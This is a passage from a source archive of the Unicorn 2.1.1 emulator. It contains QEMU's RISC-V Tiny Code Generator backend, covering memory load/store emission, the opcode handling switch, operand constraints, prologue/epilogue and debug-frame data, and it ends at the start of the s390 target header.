non-alignment bits from the address. */ compare_mask = (tcg_target_long)TARGET_PAGE_MASK | ((1 << a_bits) - 1); if (compare_mask == sextreg(compare_mask, 0, 12)) { tcg_out_opc_imm(s, OPC_ANDI, TCG_REG_TMP1, addrl, compare_mask); } else { tcg_out_movi(s, TCG_TYPE_TL, TCG_REG_TMP1, compare_mask); tcg_out_opc_reg(s, OPC_AND, TCG_REG_TMP1, TCG_REG_TMP1, addrl); } /* Compare masked address with the TLB entry. */ label_ptr[0] = s->code_ptr; tcg_out_opc_branch(s, OPC_BNE, TCG_REG_TMP0, TCG_REG_TMP1, 0); /* NOP to allow patching later */ tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_ZERO, TCG_REG_ZERO, 0); /* TLB Hit - translate address using addend. */ if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP0, addrl); addrl = TCG_REG_TMP0; } tcg_out_opc_reg(s, OPC_ADD, TCG_REG_TMP0, TCG_REG_TMP2, addrl); } static void add_qemu_ldst_label(TCGContext *s, int is_ld, TCGMemOpIdx oi, TCGType ext, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, void *raddr, tcg_insn_unit **label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->type = ext; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr[0]; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); TCGReg a0 = tcg_target_call_iarg_regs[0]; TCGReg a1 = tcg_target_call_iarg_regs[1]; TCGReg a2 = tcg_target_call_iarg_regs[2]; TCGReg a3 = tcg_target_call_iarg_regs[3]; /* We don't support oversize guests */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { g_assert_not_reached(); } /* resolve label address */ if (!patch_reloc(l->label_ptr[0], R_RISCV_BRANCH, (intptr_t) s->code_ptr, 0)) { return false; } /* call load helper */ tcg_out_mov(s, TCG_TYPE_PTR, a0, TCG_AREG0); tcg_out_mov(s, TCG_TYPE_PTR, a1, l->addrlo_reg); tcg_out_movi(s, TCG_TYPE_PTR, a2, oi); tcg_out_movi(s, TCG_TYPE_PTR, a3, (tcg_target_long)l->raddr); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_mov(s, (opc & MO_SIZE) == MO_64, l->datalo_reg, a0); tcg_out_goto(s, l->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *l) { TCGMemOpIdx oi = l->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; TCGReg a0 = tcg_target_call_iarg_regs[0]; TCGReg a1 = tcg_target_call_iarg_regs[1]; TCGReg a2 = tcg_target_call_iarg_regs[2]; TCGReg a3 = tcg_target_call_iarg_regs[3]; TCGReg a4 = tcg_target_call_iarg_regs[4]; /* We don't support oversize guests */ if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { g_assert_not_reached(); } /* resolve label address */ if (!patch_reloc(l->label_ptr[0], R_RISCV_BRANCH, (intptr_t) s->code_ptr, 0)) { return false; } /* call store helper */ tcg_out_mov(s, TCG_TYPE_PTR, a0, TCG_AREG0); tcg_out_mov(s, TCG_TYPE_PTR, a1, l->addrlo_reg); tcg_out_mov(s, TCG_TYPE_PTR, a2, l->datalo_reg); switch (s_bits) { case MO_8: tcg_out_ext8u(s, a2, a2); break; case MO_16: tcg_out_ext16u(s, a2, a2); break; default: break; } tcg_out_movi(s, TCG_TYPE_PTR, a3, oi); tcg_out_movi(s, TCG_TYPE_PTR, a4, (tcg_target_long)l->raddr); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SSIZE)]); tcg_out_goto(s, l->raddr); return true; } #endif /* CONFIG_SOFTMMU */ static void tcg_out_qemu_ld_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc, bool is_64) { const MemOp bswap = opc & MO_BSWAP; /* We don't yet handle byteswapping, assert */ g_assert(!bswap); switch (opc & (MO_SSIZE)) { case MO_UB: tcg_out_opc_imm(s, OPC_LBU, lo, base, 0); break; case MO_SB: tcg_out_opc_imm(s, OPC_LB, lo, base, 0); break; case MO_UW: tcg_out_opc_imm(s, OPC_LHU, lo, base, 0); break; case MO_SW: tcg_out_opc_imm(s, OPC_LH, lo, base, 0); break; case MO_UL: if (TCG_TARGET_REG_BITS == 64 && is_64) { tcg_out_opc_imm(s, OPC_LWU, lo, base, 0); break; } /* FALLTHRU */ case MO_SL: tcg_out_opc_imm(s, OPC_LW, lo, base, 0); break; case MO_Q: /* Prefer to load from offset 0 first, but allow for overlap. */ if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_imm(s, OPC_LD, lo, base, 0); } else if (lo != base) { tcg_out_opc_imm(s, OPC_LW, lo, base, 0); tcg_out_opc_imm(s, OPC_LW, hi, base, 4); } else { tcg_out_opc_imm(s, OPC_LW, hi, base, 4); tcg_out_opc_imm(s, OPC_LW, lo, base, 0); } break; default: g_assert_not_reached(); } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[1]; #endif TCGReg base = TCG_REG_TMP0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, addr_regl, addr_regh, oi, label_ptr, 1); tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); add_qemu_ldst_label(s, 1, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { tcg_out_opc_reg(s, OPC_ADD, base, addr_regl, TCG_REG_ZERO); } else { tcg_out_opc_reg(s, OPC_ADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_ld_direct(s, data_regl, data_regh, base, opc, is_64); #endif } static void tcg_out_qemu_st_direct(TCGContext *s, TCGReg lo, TCGReg hi, TCGReg base, MemOp opc) { const MemOp bswap = opc & MO_BSWAP; /* We don't yet handle byteswapping, assert */ g_assert(!bswap); switch (opc & (MO_SSIZE)) { case MO_8: tcg_out_opc_store(s, OPC_SB, base, lo, 0); break; case MO_16: tcg_out_opc_store(s, OPC_SH, base, lo, 0); break; case MO_32: tcg_out_opc_store(s, OPC_SW, base, lo, 0); break; case MO_64: if (TCG_TARGET_REG_BITS == 64) { tcg_out_opc_store(s, OPC_SD, base, lo, 0); } else { tcg_out_opc_store(s, OPC_SW, base, lo, 0); tcg_out_opc_store(s, OPC_SW, base, hi, 4); } break; default: g_assert_not_reached(); } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg addr_regl, addr_regh __attribute__((unused)); TCGReg data_regl, data_regh; TCGMemOpIdx oi; MemOp opc; #if defined(CONFIG_SOFTMMU) tcg_insn_unit *label_ptr[1]; #endif TCGReg base = TCG_REG_TMP0; data_regl = *args++; data_regh = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addr_regl = *args++; addr_regh = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); #if defined(CONFIG_SOFTMMU) tcg_out_tlb_load(s, addr_regl, addr_regh, oi, label_ptr, 0); tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); add_qemu_ldst_label(s, 0, oi, (is_64 ? TCG_TYPE_I64 : TCG_TYPE_I32), data_regl, data_regh, addr_regl, addr_regh, s->code_ptr, label_ptr); #else if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, base, addr_regl); addr_regl = base; } if (guest_base == 0) { tcg_out_opc_reg(s, OPC_ADD, base, addr_regl, TCG_REG_ZERO); } else { tcg_out_opc_reg(s, OPC_ADD, base, TCG_GUEST_BASE_REG, addr_regl); } tcg_out_qemu_st_direct(s, data_regl, data_regh, base, opc); #endif } static tcg_insn_unit *tb_ret_addr; static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0 = args[0]; TCGArg a1 = args[1]; TCGArg a2 = args[2]; int c2 = const_args[2]; switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ if (a0 == 0) { tcg_out_call_int(s, s->code_gen_epilogue, true); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_A0, a0); tcg_out_call_int(s, tb_ret_addr, true); } break; case INDEX_op_goto_tb: assert(s->tb_jmp_insn_offset == 0); /* indirect jump method */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_TMP0, TCG_REG_ZERO, (uintptr_t)(s->tb_jmp_target_addr + a0)); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, TCG_REG_TMP0, 0); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, a0, 0); break; case INDEX_op_br: tcg_out_reloc(s, s->code_ptr, R_RISCV_JAL, arg_label(a0), 0); tcg_out_opc_jump(s, OPC_JAL, TCG_REG_ZERO, 0); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_ldst(s, OPC_LBU, a0, a1, a2); break; case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: tcg_out_ldst(s, OPC_LB, a0, a1, a2); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_ldst(s, OPC_LHU, a0, a1, a2); break; case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: tcg_out_ldst(s, OPC_LH, a0, a1, a2); break; case INDEX_op_ld32u_i64: tcg_out_ldst(s, OPC_LWU, a0, a1, a2); break; case INDEX_op_ld_i32: case INDEX_op_ld32s_i64: tcg_out_ldst(s, OPC_LW, a0, a1, a2); break; case INDEX_op_ld_i64: tcg_out_ldst(s, OPC_LD, a0, a1, a2); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_ldst(s, OPC_SB, a0, a1, a2); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_ldst(s, OPC_SH, a0, a1, a2); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, OPC_SW, a0, a1, a2); break; case INDEX_op_st_i64: tcg_out_ldst(s, OPC_SD, a0, a1, a2); break; case INDEX_op_add_i32: if (c2) { tcg_out_opc_imm(s, OPC_ADDIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_ADDW, a0, a1, a2); } break; case INDEX_op_add_i64: if (c2) { tcg_out_opc_imm(s, OPC_ADDI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_ADD, a0, a1, a2); } break; case INDEX_op_sub_i32: if (c2) { tcg_out_opc_imm(s, OPC_ADDIW, a0, a1, -a2); } else { tcg_out_opc_reg(s, OPC_SUBW, a0, a1, a2); } break; case INDEX_op_sub_i64: if (c2) { tcg_out_opc_imm(s, OPC_ADDI, a0, a1, -a2); } else { tcg_out_opc_reg(s, OPC_SUB, a0, a1, a2); } break; case INDEX_op_and_i32: case INDEX_op_and_i64: if (c2) { tcg_out_opc_imm(s, OPC_ANDI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_AND, a0, a1, a2); } break; case INDEX_op_or_i32: case INDEX_op_or_i64: if (c2) { tcg_out_opc_imm(s, OPC_ORI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_OR, a0, a1, a2); } break; case INDEX_op_xor_i32: case INDEX_op_xor_i64: if (c2) { tcg_out_opc_imm(s, OPC_XORI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_XOR, a0, a1, a2); } break; case INDEX_op_not_i32: case INDEX_op_not_i64: tcg_out_opc_imm(s, OPC_XORI, a0, a1, -1); break; case INDEX_op_neg_i32: tcg_out_opc_reg(s, OPC_SUBW, a0, TCG_REG_ZERO, a1); break; case INDEX_op_neg_i64: tcg_out_opc_reg(s, OPC_SUB, a0, TCG_REG_ZERO, a1); break; case INDEX_op_mul_i32: tcg_out_opc_reg(s, OPC_MULW, a0, a1, a2); break; case INDEX_op_mul_i64: tcg_out_opc_reg(s, OPC_MUL, a0, a1, a2); break; case INDEX_op_div_i32: tcg_out_opc_reg(s, OPC_DIVW, a0, a1, a2); break; case INDEX_op_div_i64: tcg_out_opc_reg(s, OPC_DIV, a0, a1, a2); break; case INDEX_op_divu_i32: tcg_out_opc_reg(s, OPC_DIVUW, a0, a1, a2); break; case INDEX_op_divu_i64: tcg_out_opc_reg(s, OPC_DIVU, a0, a1, a2); break; case INDEX_op_rem_i32: tcg_out_opc_reg(s, OPC_REMW, a0, a1, a2); break; case INDEX_op_rem_i64: tcg_out_opc_reg(s, OPC_REM, a0, a1, a2); break; case INDEX_op_remu_i32: tcg_out_opc_reg(s, OPC_REMUW, a0, a1, a2); break; case INDEX_op_remu_i64: tcg_out_opc_reg(s, OPC_REMU, a0, a1, a2); break; case INDEX_op_shl_i32: if (c2) { tcg_out_opc_imm(s, OPC_SLLIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SLLW, a0, a1, a2); } break; case INDEX_op_shl_i64: if (c2) { tcg_out_opc_imm(s, OPC_SLLI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SLL, a0, a1, a2); } break; case INDEX_op_shr_i32: if (c2) { tcg_out_opc_imm(s, OPC_SRLIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRLW, a0, a1, a2); } break; case INDEX_op_shr_i64: if (c2) { tcg_out_opc_imm(s, OPC_SRLI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRL, a0, a1, a2); } break; case INDEX_op_sar_i32: if (c2) { tcg_out_opc_imm(s, OPC_SRAIW, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRAW, a0, a1, a2); } break; case INDEX_op_sar_i64: if (c2) { tcg_out_opc_imm(s, OPC_SRAI, a0, a1, a2); } else { tcg_out_opc_reg(s, OPC_SRA, a0, a1, a2); } break; case INDEX_op_add2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false, true); break; case INDEX_op_add2_i64: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], false, false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true, true); break; case INDEX_op_sub2_i64: tcg_out_addsub2(s, a0, a1, a2, args[3], args[4], args[5], const_args[4], const_args[5], true, false); break; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: tcg_out_brcond(s, a2, a0, a1, arg_label(args[3])); break; case INDEX_op_brcond2_i32: tcg_out_brcond2(s, args[4], a0, a1, a2, args[3], arg_label(args[5])); break; case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: tcg_out_setcond(s, args[3], a0, a1, a2); break; case INDEX_op_setcond2_i32: tcg_out_setcond2(s, args[5], a0, a1, a2, args[3], args[4]); break; case INDEX_op_qemu_ld_i32: tcg_out_qemu_ld(s, args, false); break; case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args, true); break; case INDEX_op_qemu_st_i32: tcg_out_qemu_st(s, args, false); break; case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args, true); break; case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: tcg_out_ext8u(s, a0, a1); break; case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: tcg_out_ext16u(s, a0, a1); break; case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: tcg_out_ext32u(s, a0, a1); break; case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: tcg_out_ext8s(s, a0, a1); break; case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: tcg_out_ext16s(s, a0, a1); break; case INDEX_op_ext32s_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_ext_i32_i64: tcg_out_ext32s(s, a0, a1); break; case INDEX_op_extrh_i64_i32: tcg_out_opc_imm(s, OPC_SRAI, a0, a1, 32); break; case INDEX_op_mulsh_i32: case INDEX_op_mulsh_i64: tcg_out_opc_reg(s, OPC_MULH, a0, a1, a2); break; case INDEX_op_muluh_i32: case INDEX_op_muluh_i64: tcg_out_opc_reg(s, OPC_MULHU, a0, a1, a2); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: g_assert_not_reached(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef rZ_rZ = { .args_ct_str = { "rZ", "rZ" } }; static const TCGTargetOpDef rZ_rZ_rZ_rZ = { .args_ct_str = { "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rI = { .args_ct_str = { "r", "r", "rI" } }; static const TCGTargetOpDef r_rZ_rN = { .args_ct_str = { "r", "rZ", "rN" } }; static const TCGTargetOpDef r_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef r_rZ_rZ_rZ_rZ = { .args_ct_str = { "r", "rZ", "rZ", "rZ", "rZ" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef r_r_L = { .args_ct_str = { "r", "r", "L" } }; static const TCGTargetOpDef r_L_L = { .args_ct_str = { "r", "L", "L" } }; static const TCGTargetOpDef r_r_L_L = { .args_ct_str = { "r", "r", "L", "L" } }; static const TCGTargetOpDef LZ_L = { .args_ct_str = { "LZ", "L" } }; static const TCGTargetOpDef LZ_L_L = { .args_ct_str = { "LZ", "L", "L" } }; static const TCGTargetOpDef LZ_LZ_L = { .args_ct_str = { "LZ", "LZ", "L" } }; static const TCGTargetOpDef LZ_LZ_L_L = { .args_ct_str = { "LZ", "LZ", "L", "L" } }; static const TCGTargetOpDef r_r_rZ_rZ_rM_rM = { .args_ct_str = { "r", "r", "rZ", "rZ", "rM", "rM" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_not_i32: case INDEX_op_neg_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld_i64: case INDEX_op_not_i64: case INDEX_op_neg_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32u_i64: case INDEX_op_extu_i32_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_extrh_i64_i32: case INDEX_op_ext_i32_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_and_i32: case INDEX_op_or_i32: case INDEX_op_xor_i32: case INDEX_op_add_i64: case INDEX_op_and_i64: case INDEX_op_or_i64: case INDEX_op_xor_i64: return &r_r_rI; case INDEX_op_sub_i32: case INDEX_op_sub_i64: return &r_rZ_rN; case INDEX_op_mul_i32: case INDEX_op_mulsh_i32: case INDEX_op_muluh_i32: case INDEX_op_div_i32: case INDEX_op_divu_i32: case INDEX_op_rem_i32: case INDEX_op_remu_i32: case INDEX_op_setcond_i32: case INDEX_op_mul_i64: case INDEX_op_mulsh_i64: case INDEX_op_muluh_i64: case INDEX_op_div_i64: case INDEX_op_divu_i64: case INDEX_op_rem_i64: case INDEX_op_remu_i64: case INDEX_op_setcond_i64: return &r_rZ_rZ; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: return &r_r_ri; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &rZ_rZ; case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: return &r_r_rZ_rZ_rM_rM; case INDEX_op_brcond2_i32: return &rZ_rZ_rZ_rZ; case INDEX_op_setcond2_i32: return &r_rZ_rZ_rZ_rZ; case INDEX_op_qemu_ld_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_L : &r_L_L; case INDEX_op_qemu_st_i32: return TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &LZ_L : &LZ_L_L; case INDEX_op_qemu_ld_i64: return TCG_TARGET_REG_BITS == 64 ? &r_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &r_r_L : &r_r_L_L; case INDEX_op_qemu_st_i64: return TCG_TARGET_REG_BITS == 64 ? &LZ_L : TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? &LZ_LZ_L : &LZ_LZ_L_L; default: return NULL; } } static const int tcg_target_callee_save_regs[] = { TCG_REG_S0, /* used for the global env (TCG_AREG0) */ TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, TCG_REG_S9, TCG_REG_S10, TCG_REG_S11, TCG_REG_RA, /* should be last for ABI compliance */ }; /* Stack frame parameters. */ #define REG_SIZE (TCG_TARGET_REG_BITS / 8) #define SAVE_SIZE ((int)ARRAY_SIZE(tcg_target_callee_save_regs) * REG_SIZE) #define TEMP_SIZE (CPU_TEMP_BUF_NLONGS * (int)sizeof(long)) #define FRAME_SIZE ((TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE + SAVE_SIZE \ + TCG_TARGET_STACK_ALIGN - 1) \ & -TCG_TARGET_STACK_ALIGN) #define SAVE_OFS (TCG_STATIC_CALL_ARGS_SIZE + TEMP_SIZE) /* We're expecting to be able to use an immediate for frame allocation. */ QEMU_BUILD_BUG_ON(FRAME_SIZE > 0x7ff); /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i; tcg_set_frame(s, TCG_REG_SP, TCG_STATIC_CALL_ARGS_SIZE, TEMP_SIZE); /* TB prologue */ tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_SP, TCG_REG_SP, -FRAME_SIZE); for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_st(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } #if !defined(CONFIG_SOFTMMU) tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); #endif /* Call generated code */ tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, tcg_target_call_iarg_regs[1], 0); /* Return path for goto_ptr. Set return value to 0 */ s->code_gen_epilogue = s->code_ptr; tcg_out_mov(s, TCG_TYPE_REG, TCG_REG_A0, TCG_REG_ZERO); /* TB epilogue */ tb_ret_addr = s->code_ptr; for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_ld(s, TCG_TYPE_REG, tcg_target_callee_save_regs[i], TCG_REG_SP, SAVE_OFS + i * REG_SIZE); } tcg_out_opc_imm(s, OPC_ADDI, TCG_REG_SP, TCG_REG_SP, FRAME_SIZE); tcg_out_opc_imm(s, OPC_JALR, TCG_REG_ZERO, TCG_REG_RA, 0); } static void tcg_target_init(TCGContext *s) { s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff; } s->tcg_target_call_clobber_regs = -1u; tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S0); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S1); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S2); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S3); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S4); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S5); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S6); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S7); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S8); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S9); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S10); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_S11); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP0); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP1); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TMP2); tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); tcg_regset_set_reg(s->reserved_regs, TCG_REG_TP); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2]; } DebugFrame; #define ELF_HOST_MACHINE EM_RISCV static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE) - 4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -(TCG_TARGET_REG_BITS / 8) & 0x7f, /* sleb128 */ .h.cie.return_column = TCG_REG_RA, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_SP, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x80 + 9, 12, /* DW_CFA_offset, s1, -96 */ 0x80 + 18, 11, /* DW_CFA_offset, s2, -88 */ 0x80 + 19, 10, /* DW_CFA_offset, s3, -80 */ 0x80 + 20, 9, /* DW_CFA_offset, s4, -72 */ 0x80 + 21, 8, /* DW_CFA_offset, s5, -64 */ 0x80 + 22, 7, /* DW_CFA_offset, s6, -56 */ 0x80 + 23, 6, /* DW_CFA_offset, s7, -48 */ 0x80 + 24, 5, /* DW_CFA_offset, s8, -40 */ 0x80 + 25, 4, /* DW_CFA_offset, s9, -32 */ 0x80 + 26, 3, /* DW_CFA_offset, s10, -24 */ 0x80 + 27, 2, /* DW_CFA_offset, s11, -16 */ 0x80 + 1 , 1, /* DW_CFA_offset, ra, -8 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } ���������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/s390/������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015426�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/s390/tcg-target.h������������������������������������������������������������0000664�0000000�0000000�00000013537�14675241067�0017651�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2009 Ulrich Hecht <uli@suse.de> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO 